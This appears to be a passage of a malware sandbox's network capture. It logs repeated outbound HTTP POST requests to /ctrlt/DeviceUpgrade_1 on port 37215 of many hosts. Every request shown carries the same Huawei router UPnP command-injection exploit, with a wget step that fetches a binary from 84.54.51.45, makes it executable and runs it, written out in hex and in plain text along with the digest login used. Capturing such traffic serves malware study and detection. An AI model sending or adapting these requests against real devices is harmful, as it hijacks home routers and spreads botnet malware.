                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1235192.168.2.1534860197.36.105.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729207039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1236192.168.2.1534798197.123.61.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729243040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1237192.168.2.1557220197.147.74.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729245901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1238192.168.2.1542762197.24.109.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729259968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1239192.168.2.1560420197.59.185.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729283094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1240192.168.2.1549244197.141.216.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729326963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1241192.168.2.1551874197.19.91.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729330063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1242192.168.2.1557982197.125.234.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729357004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1243192.168.2.1552044197.20.10.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729362965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1244192.168.2.1558056197.207.94.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729379892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
